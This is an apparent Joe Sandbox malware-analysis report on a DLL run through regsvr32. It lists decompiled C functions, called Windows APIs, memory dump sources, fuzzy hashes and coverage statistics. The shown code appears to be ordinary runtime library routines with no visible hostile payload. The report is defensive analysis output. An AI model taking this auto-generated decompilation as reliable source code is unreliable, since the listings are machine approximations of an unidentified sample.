                                                                                                      0x7ff87c1114b9
                                                                                                      0x7ff87c1114c6
                                                                                                      0x7ff87c1114cb
                                                                                                      0x7ff87c1114cd
                                                                                                      0x7ff87c1114da
                                                                                                      0x7ff87c1114df
                                                                                                      0x7ff87c1114ec
                                                                                                      0x7ff87c1114ef
                                                                                                      0x7ff87c1114f7
                                                                                                      0x7ff87c1114fb
                                                                                                      0x7ff87c111506
                                                                                                      0x7ff87c111508
                                                                                                      0x7ff87c11150e
                                                                                                      0x7ff87c111514
                                                                                                      0x7ff87c111519
                                                                                                      0x7ff87c111533
                                                                                                      0x7ff87c111535
                                                                                                      0x7ff87c11153a
                                                                                                      0x7ff87c11153f
                                                                                                      0x7ff87c111541
                                                                                                      0x7ff87c111545
                                                                                                      0x7ff87c11154c
                                                                                                      0x7ff87c111550
                                                                                                      0x7ff87c111553
                                                                                                      0x7ff87c11155b
                                                                                                      0x7ff87c11155e
                                                                                                      0x7ff87c111563
                                                                                                      0x7ff87c111572
                                                                                                      0x7ff87c111578
                                                                                                      0x7ff87c11157a
                                                                                                      0x7ff87c11157e
                                                                                                      0x7ff87c111582
                                                                                                      0x7ff87c111589
                                                                                                      0x7ff87c11158d
                                                                                                      0x7ff87c111597
                                                                                                      0x7ff87c1115ab

                                                                                                      APIs
                                                                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF87C11123C), ref: 00007FF87C1113BF
                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF87C11123C), ref: 00007FF87C111449
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.319732788.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.319720606.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.319807527.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320036966.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320042986.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320055373.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320061148.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff87c100000_regsvr32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConsoleErrorLastMode
                                                                                                      • String ID:
                                                                                                      • API String ID: 953036326-0
                                                                                                      • Opcode ID: da2f82535048981fdee2fbb5626fefef0911d61da315dbd697428ec573955214
                                                                                                      • Instruction ID: 9af842bd599ce4bd0035824cc4db8f3a59a34d568db860ec03bd81a6391ee791
                                                                                                      • Opcode Fuzzy Hash: da2f82535048981fdee2fbb5626fefef0911d61da315dbd697428ec573955214
                                                                                                      • Instruction Fuzzy Hash: 1991BE63A3865286FB908F65D4803BDA7A0BB06BD8F655136DE0E57A94DF3CD4C1C320
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 47%
                                                                                                      			E00007FF87FF87C101CE0(void* __rax, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24) {
                                                                                                      				long long _v16;
                                                                                                      				long long _v24;
                                                                                                      				intOrPtr* _t48;
                                                                                                      				intOrPtr* _t50;
                                                                                                      				intOrPtr* _t52;
                                                                                                      				intOrPtr _t62;
                                                                                                      
                                                                                                      				_a24 = __r8;
                                                                                                      				_a16 = __rdx;
                                                                                                      				_a8 = __rcx;
                                                                                                      				if ((E00007FF87FF87C102250(__rax, _a8, _a16) & 0x000000ff) == 0) goto 0x7c101d3a;
                                                                                                      				E00007FF87FF87C1018F0(__rax, _a8);
                                                                                                      				_t48 = _a16 - __rax;
                                                                                                      				E00007FF87FF87C101DF0(_t48, _a8, _a8, _t48, _a24);
                                                                                                      				goto 0x7c101de7;
                                                                                                      				E00007FF87FF87C102170(_t48, _a8);
                                                                                                      				_t62 =  *0x7c17a228; // 0xffffffffffffffff
                                                                                                      				_t50 = _t62 -  *_t48;
                                                                                                      				if (_t50 - _a24 > 0) goto 0x7c101d65;
                                                                                                      				E00007FF87FF87C102230(_a8);
                                                                                                      				E00007FF87FF87C102170(_t50, _a8);
                                                                                                      				_t52 =  *_t50 + _a24;
                                                                                                      				_v24 = _t52;
                                                                                                      				if (_a24 <= 0) goto 0x7c101de2;
                                                                                                      				r8d = 0;
                                                                                                      				if ((E00007FF87FF87C1022B0(_t52, _a8, _v24) & 0x000000ff) == 0) goto 0x7c101de2;
                                                                                                      				E00007FF87FF87C1018F0(_t52, _a8);
                                                                                                      				_v16 = _t52;
                                                                                                      				E00007FF87FF87C102170(_t52, _a8);
                                                                                                      				E00007FF87FF87C1011E0(_v16 +  *_t52, _a16, _a24);
                                                                                                      				return E00007FF87FF87C1023A0(_v16 +  *_t52, _a8, _v24);
                                                                                                      			}









                                                                                                      0x7ff87c101ce0
                                                                                                      0x7ff87c101ce5
                                                                                                      0x7ff87c101cea
                                                                                                      0x7ff87c101d07
                                                                                                      0x7ff87c101d0e
                                                                                                      0x7ff87c101d1b
                                                                                                      0x7ff87c101d30
                                                                                                      0x7ff87c101d35
                                                                                                      0x7ff87c101d3f
                                                                                                      0x7ff87c101d47
                                                                                                      0x7ff87c101d51
                                                                                                      0x7ff87c101d59
                                                                                                      0x7ff87c101d60
                                                                                                      0x7ff87c101d6a
                                                                                                      0x7ff87c101d72
                                                                                                      0x7ff87c101d77
                                                                                                      0x7ff87c101d82
                                                                                                      0x7ff87c101d84
                                                                                                      0x7ff87c101d9b
                                                                                                      0x7ff87c101da2
                                                                                                      0x7ff87c101da7
                                                                                                      0x7ff87c101db1
                                                                                                      0x7ff87c101dce
                                                                                                      0x7ff87c101deb

                                                                                                      APIs
                                                                                                        • Part of subcall function 00007FF87C102250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C10226B
                                                                                                        • Part of subcall function 00007FF87C102250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C10227C
                                                                                                      • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C101D0E
                                                                                                        • Part of subcall function 00007FF87C1018F0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF87C1018FE
                                                                                                        • Part of subcall function 00007FF87C101DF0: _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FF87C101E56
                                                                                                        • Part of subcall function 00007FF87C101DF0: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C101E98
                                                                                                        • Part of subcall function 00007FF87C101DF0: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C101EAC
                                                                                                        • Part of subcall function 00007FF87C101DF0: char_traits.LIBCPMTD ref: 00007FF87C101EDB
                                                                                                      • _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FF87C101D60
                                                                                                      • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C101DA2
                                                                                                      • char_traits.LIBCPMTD ref: 00007FF87C101DCE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.319732788.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.319720606.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.319807527.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320036966.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320042986.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320055373.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320061148.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff87c100000_regsvr32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::Work$Base::ContextIdentityQueue$Mtx_guardMtx_guard::~_char_traits$EmptyQueue::Structured
                                                                                                      • String ID:
                                                                                                      • API String ID: 3922470843-0
                                                                                                      • Opcode ID: 4dd965a4b7583710b631a5fedce481fd092c87ca81ad6a4c948c4480f87ae1a4
                                                                                                      • Instruction ID: 7d3e1d4eae95850007e973a6e013f513290022b695afc8a4c3e278d53c1cf0e8
                                                                                                      • Opcode Fuzzy Hash: 4dd965a4b7583710b631a5fedce481fd092c87ca81ad6a4c948c4480f87ae1a4
                                                                                                      • Instruction Fuzzy Hash: 8021BF2362CA8581DB10EB56E45126EA370FBCABC0F604036FB9D47B6ADE7DD5908B50
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 50%
                                                                                                      			E00007FF87FF87C101DF0(intOrPtr* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32) {
                                                                                                      				long long _v24;
                                                                                                      				long long _v32;
                                                                                                      				long long _v40;
                                                                                                      				void* _t44;
                                                                                                      				intOrPtr* _t49;
                                                                                                      				intOrPtr* _t51;
                                                                                                      				long long _t53;
                                                                                                      				intOrPtr* _t54;
                                                                                                      				intOrPtr _t61;
                                                                                                      
                                                                                                      				_t49 = __rax;
                                                                                                      				_a32 = __r9;
                                                                                                      				_a24 = __r8;
                                                                                                      				_a16 = __rdx;
                                                                                                      				_a8 = __rcx;
                                                                                                      				E00007FF87FF87C1021F0(_t44, __rax, _a16, _a24);
                                                                                                      				E00007FF87FF87C102400(_t44, __rax, _a16, _a24, _a32);
                                                                                                      				_a32 = _t49;
                                                                                                      				E00007FF87FF87C102170(_t49, _a8);
                                                                                                      				_t61 =  *0x7c17a228; // 0xffffffffffffffff
                                                                                                      				_t51 = _t61 -  *_t49;
                                                                                                      				if (_t51 - _a32 > 0) goto 0x7c101e5b;
                                                                                                      				E00007FF87FF87C102230(_a8);
                                                                                                      				E00007FF87FF87C102170(_t51, _a8);
                                                                                                      				_t53 =  *_t51 + _a32;
                                                                                                      				_v40 = _t53;
                                                                                                      				if (_a32 <= 0) goto 0x7c101eef;
                                                                                                      				r8d = 0;
                                                                                                      				if ((E00007FF87FF87C1022B0(_t53, _a8, _v40) & 0x000000ff) == 0) goto 0x7c101eef;
                                                                                                      				E00007FF87FF87C1018D0(_t53, _a16);
                                                                                                      				_t54 = _t53 + _a24;
                                                                                                      				_v24 = _t54;
                                                                                                      				E00007FF87FF87C1018F0(_t54, _a8);
                                                                                                      				_v32 = _t54;
                                                                                                      				E00007FF87FF87C102170(_t54, _a8);
                                                                                                      				E00007FF87FF87C1011E0(_v32 +  *_t54, _v24, _a32);
                                                                                                      				return E00007FF87FF87C1023A0(_v32 +  *_t54, _a8, _v40);
                                                                                                      			}












                                                                                                      0x7ff87c101df0
                                                                                                      0x7ff87c101df0
                                                                                                      0x7ff87c101df5
                                                                                                      0x7ff87c101dfa
                                                                                                      0x7ff87c101dff
                                                                                                      0x7ff87c101e12
                                                                                                      0x7ff87c101e26
                                                                                                      0x7ff87c101e2b
                                                                                                      0x7ff87c101e35
                                                                                                      0x7ff87c101e3d
                                                                                                      0x7ff87c101e47
                                                                                                      0x7ff87c101e4f
                                                                                                      0x7ff87c101e56
                                                                                                      0x7ff87c101e60
                                                                                                      0x7ff87c101e68
                                                                                                      0x7ff87c101e6d
                                                                                                      0x7ff87c101e78
                                                                                                      0x7ff87c101e7a
                                                                                                      0x7ff87c101e91
                                                                                                      0x7ff87c101e98
                                                                                                      0x7ff87c101e9d
                                                                                                      0x7ff87c101ea2
                                                                                                      0x7ff87c101eac
                                                                                                      0x7ff87c101eb1
                                                                                                      0x7ff87c101ebb
                                                                                                      0x7ff87c101edb
                                                                                                      0x7ff87c101ef8

                                                                                                      APIs
                                                                                                        • Part of subcall function 00007FF87C1021F0: _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FF87C102217
                                                                                                        • Part of subcall function 00007FF87C102170: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF87C10217E
                                                                                                      • _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FF87C101E56
                                                                                                      • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C101E98
                                                                                                      • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C101EAC
                                                                                                      • char_traits.LIBCPMTD ref: 00007FF87C101EDB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.319732788.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.319720606.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.319807527.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320036966.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320042986.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320055373.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320061148.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff87c100000_regsvr32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::Work$Base::ContextIdentityMtx_guardMtx_guard::~_Queue$EmptyQueue::Structuredchar_traits
                                                                                                      • String ID:
                                                                                                      • API String ID: 3679362534-0
                                                                                                      • Opcode ID: 980ae18186fb1950204f52d148c7e17274a98d6da8dd13de02d4ec76e85661ca
                                                                                                      • Instruction ID: 1d2b472973573858ad095fd7873b69b11b6ad54712a6d5c365ffeb4dbb969bbc
                                                                                                      • Opcode Fuzzy Hash: 980ae18186fb1950204f52d148c7e17274a98d6da8dd13de02d4ec76e85661ca
                                                                                                      • Instruction Fuzzy Hash: 2621CD73628B4581DB10DB56E49126EA760FBCABD0F000036FA9D47B6ADE7CD5908B50
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 56%
                                                                                                      			E00007FF87FF87C111004(signed int __edx, void* __edi, void* __rax, signed long long __rbx, intOrPtr* __rcx, long long __rbp, signed short* __r8, signed long long _a8, signed long long _a16, long long _a24, char _a40, char _a1744, char _a1752, signed int _a5176, void* _a5192) {
                                                                                                      				intOrPtr _v0;
                                                                                                      				signed long long _v8;
                                                                                                      				void* __rdi;
                                                                                                      				void* __rsi;
                                                                                                      				signed int _t41;
                                                                                                      				signed long long _t62;
                                                                                                      				short* _t67;
                                                                                                      				signed int* _t68;
                                                                                                      				intOrPtr* _t74;
                                                                                                      				intOrPtr* _t76;
                                                                                                      				void* _t84;
                                                                                                      				void* _t88;
                                                                                                      				signed short* _t89;
                                                                                                      				void* _t91;
                                                                                                      				void* _t94;
                                                                                                      				signed short* _t97;
                                                                                                      				void* _t99;
                                                                                                      				void* _t101;
                                                                                                      				void* _t103;
                                                                                                      				void* _t106;
                                                                                                      				void* _t107;
                                                                                                      
                                                                                                      				_t97 = __r8;
                                                                                                      				_t76 = __rcx;
                                                                                                      				_a8 = __rbx;
                                                                                                      				_a24 = __rbp;
                                                                                                      				E00007FF87FF87C112DE0(__edx, __rax, __rbx, __rcx, _t84, _t88, _t91, __r8, _t99, _t101, _t103);
                                                                                                      				_t62 =  *0x7c17e008; // 0xefd957cda2cd
                                                                                                      				_a5176 = _t62 ^ _t94 - __rax;
                                                                                                      				_t74 = _t76;
                                                                                                      				r14d = r9d;
                                                                                                      				r10d = r10d & 0x0000003f;
                                                                                                      				_t107 = _t106 + _t97;
                                                                                                      				_t89 = _t97;
                                                                                                      				 *_t74 =  *((intOrPtr*)(0x7c17f940 + (__edx >> 6) * 8));
                                                                                                      				 *((intOrPtr*)(_t74 + 8)) = 0;
                                                                                                      				if (_t97 - _t107 >= 0) goto 0x7c111145;
                                                                                                      				_t67 =  &_a40;
                                                                                                      				if (_t89 - _t107 >= 0) goto 0x7c1110ae;
                                                                                                      				_t41 =  *_t89 & 0x0000ffff;
                                                                                                      				if (_t41 != 0xa) goto 0x7c11109a;
                                                                                                      				 *_t67 = 0xd;
                                                                                                      				_t68 = _t67 + 2;
                                                                                                      				 *_t68 = _t41;
                                                                                                      				if ( &(_t68[0]) -  &_a1744 < 0) goto 0x7c11107c;
                                                                                                      				_a16 = _a16 & 0x00000000;
                                                                                                      				_a8 = _a8 & 0x00000000;
                                                                                                      				_v0 = 0xd55;
                                                                                                      				_v8 =  &_a1752;
                                                                                                      				r9d = 0;
                                                                                                      				E00007FF87FF87C10D698();
                                                                                                      				if (0 == 0) goto 0x7c11113d;
                                                                                                      				if (0 == 0) goto 0x7c11112d;
                                                                                                      				_v8 = _v8 & 0x00000000;
                                                                                                      				r8d = 0;
                                                                                                      				r8d = r8d;
                                                                                                      				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x7c11113d;
                                                                                                      				if (0 + _a24 < 0) goto 0x7c1110fa;
                                                                                                      				 *((intOrPtr*)(_t74 + 4)) = __edi - r15d;
                                                                                                      				goto 0x7c111071;
                                                                                                      				 *_t74 = GetLastError();
                                                                                                      				return E00007FF87FF87C103A70(_t39, 0, 0, _a5176 ^ _t94 - __rax);
                                                                                                      			}
























                                                                                                      0x7ff87c111004
                                                                                                      0x7ff87c111004
                                                                                                      0x7ff87c111004
                                                                                                      0x7ff87c111009
                                                                                                      0x7ff87c11101b
                                                                                                      0x7ff87c111023
                                                                                                      0x7ff87c11102d
                                                                                                      0x7ff87c111038
                                                                                                      0x7ff87c11103e
                                                                                                      0x7ff87c11104c
                                                                                                      0x7ff87c111050
                                                                                                      0x7ff87c111056
                                                                                                      0x7ff87c111068
                                                                                                      0x7ff87c11106e
                                                                                                      0x7ff87c111071
                                                                                                      0x7ff87c111077
                                                                                                      0x7ff87c11107f
                                                                                                      0x7ff87c111081
                                                                                                      0x7ff87c11108c
                                                                                                      0x7ff87c111093
                                                                                                      0x7ff87c111096
                                                                                                      0x7ff87c11109a
                                                                                                      0x7ff87c1110ac
                                                                                                      0x7ff87c1110ae
                                                                                                      0x7ff87c1110b9
                                                                                                      0x7ff87c1110c7
                                                                                                      0x7ff87c1110da
                                                                                                      0x7ff87c1110df
                                                                                                      0x7ff87c1110e9
                                                                                                      0x7ff87c1110f2
                                                                                                      0x7ff87c1110f8
                                                                                                      0x7ff87c1110fa
                                                                                                      0x7ff87c11110f
                                                                                                      0x7ff87c111118
                                                                                                      0x7ff87c111123
                                                                                                      0x7ff87c11112b
                                                                                                      0x7ff87c111132
                                                                                                      0x7ff87c111138
                                                                                                      0x7ff87c111143
                                                                                                      0x7ff87c111173

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.319732788.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.319720606.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.319807527.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320036966.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320042986.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320055373.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320061148.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff87c100000_regsvr32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                      • String ID: U
                                                                                                      • API String ID: 442123175-4171548499
                                                                                                      • Opcode ID: f98079f3c4aa1eb608d226a3e204fe1cd29820aa8a2509467dcded0e9b762ee9
                                                                                                      • Instruction ID: 2a5922f2e341c22182ac35dee1b0d71bf50ec34f188af4678aaaec01378e1016
                                                                                                      • Opcode Fuzzy Hash: f98079f3c4aa1eb608d226a3e204fe1cd29820aa8a2509467dcded0e9b762ee9
                                                                                                      • Instruction Fuzzy Hash: E041C323B28A8186EB20CF25E4443AAA7A0FB897D4F954031EE4D87798DF3CD481C760
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 100%
                                                                                                      			E00007FF87FF87C112EB4(intOrPtr* __rcx) {
                                                                                                      				void* __rbx;
                                                                                                      				void* _t3;
                                                                                                      				void* _t7;
                                                                                                      				void* _t10;
                                                                                                      				void* _t11;
                                                                                                      				void* _t12;
                                                                                                      				void* _t13;
                                                                                                      
                                                                                                      				_t3 = E00007FF87FF87C106B4C(_t7, __rcx, __rcx, _t10, _t11, _t12, _t13);
                                                                                                      				if (( *(__rcx + 4) & 0x00000066) != 0) goto 0x7c112ed5;
                                                                                                      				if ( *__rcx != 0xe06d7363) goto 0x7c112ed5;
                                                                                                      				if (_t3 == 1) goto 0x7c112edb;
                                                                                                      				return _t3;
                                                                                                      			}










                                                                                                      0x7ff87c112ebd
                                                                                                      0x7ff87c112ec6
                                                                                                      0x7ff87c112ece
                                                                                                      0x7ff87c112ed3
                                                                                                      0x7ff87c112eda

                                                                                                      APIs
                                                                                                      • __C_specific_handler.LIBVCRUNTIME ref: 00007FF87C112EBD
                                                                                                        • Part of subcall function 00007FF87C106B4C: _IsNonwritableInCurrentImage.LIBCMT ref: 00007FF87C106C0C
                                                                                                        • Part of subcall function 00007FF87C106B4C: RtlUnwindEx.KERNEL32 ref: 00007FF87C106C5B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.319732788.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.319720606.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.319807527.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320036966.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320042986.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320055373.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320061148.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff87c100000_regsvr32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: C_specific_handlerCurrentImageNonwritableUnwind
                                                                                                      • String ID: csm$f
                                                                                                      • API String ID: 1396615161-629598281
                                                                                                      • Opcode ID: 8a5be923c7cc1b99aa4a0096ba3a69dd8979e15323e2be363a2fe093e1ce8b04
                                                                                                      • Instruction ID: 8d76056d45e523c9f49ffbd1944de9ff94806116323cd3d4e5236fb4cbef553a
                                                                                                      • Opcode Fuzzy Hash: 8a5be923c7cc1b99aa4a0096ba3a69dd8979e15323e2be363a2fe093e1ce8b04
                                                                                                      • Instruction Fuzzy Hash: 39D05E53E2A14A86FB392575904537C15905F1E7A4E088470C96806286AE1D98D04621
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.319732788.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.319720606.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.319807527.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320036966.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320042986.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320055373.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320061148.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff87c100000_regsvr32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ClassCursorLoadRegister
                                                                                                      • String ID: P
                                                                                                      • API String ID: 1693014935-3110715001
                                                                                                      • Opcode ID: 29bdbaf3f29e2b1f60e2da6c671781d039cfe66c367808efb662ff8ab2e4e8d5
                                                                                                      • Instruction ID: 23e2864b2276503fa98b22f8a33f1ab4bbae52402cead63deeefcacc20361c0a
                                                                                                      • Opcode Fuzzy Hash: 29bdbaf3f29e2b1f60e2da6c671781d039cfe66c367808efb662ff8ab2e4e8d5
                                                                                                      • Instruction Fuzzy Hash: 0701AF32529B8086E7608F00F89835AB7B4F789788F600129E6CD46BA8DFBDD158CB44
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 37%
                                                                                                      			E00007FF87FF87C10472C(void* __eflags, void* __rax) {
                                                                                                      				char _v40;
                                                                                                      				void* _t6;
                                                                                                      				void* _t11;
                                                                                                      				void* _t12;
                                                                                                      				char* _t14;
                                                                                                      				void* _t16;
                                                                                                      
                                                                                                      				E00007FF87FF87C1045C0(__rax,  &_v40);
                                                                                                      				_t14 =  &_v40;
                                                                                                      				_t6 = E00007FF87FF87C106E00(_t12, _t14, 0x7c17cbd8, _t16);
                                                                                                      				asm("int3");
                                                                                                      				_t11 =  !=  ?  *((void*)(_t14 + 8)) : "Unknown exception";
                                                                                                      				return _t6;
                                                                                                      			}









                                                                                                      0x7ff87c104735
                                                                                                      0x7ff87c104741
                                                                                                      0x7ff87c104746
                                                                                                      0x7ff87c10474b
                                                                                                      0x7ff87c104758
                                                                                                      0x7ff87c10475d

                                                                                                      APIs
                                                                                                      • std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF87C104735
                                                                                                      • _CxxThrowException.LIBVCRUNTIME ref: 00007FF87C104746
                                                                                                        • Part of subcall function 00007FF87C106E00: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF87C10472B), ref: 00007FF87C106E7D
                                                                                                        • Part of subcall function 00007FF87C106E00: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF87C10472B), ref: 00007FF87C106EBC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.319732788.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.319720606.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.319807527.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320036966.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320042986.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320055373.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320061148.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff87c100000_regsvr32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
                                                                                                      • String ID: Unknown exception
                                                                                                      • API String ID: 3561508498-410509341
                                                                                                      • Opcode ID: 245809459ad59a2729b59716ed244728fe2af4985c2eaed7b011566377c0e5b0
                                                                                                      • Instruction ID: 88078eea60911f1e13de9ff62e7596382921f3edaed9aad793a1e33bca696de7
                                                                                                      • Opcode Fuzzy Hash: 245809459ad59a2729b59716ed244728fe2af4985c2eaed7b011566377c0e5b0
                                                                                                      • Instruction Fuzzy Hash: 57D01723A28A86D5EF10DB00D8803A86330FB81388F904532E14C439B1DF2CD6CAC360
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:12.3%
                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:46
                                                                                                      Total number of Limit Nodes:2
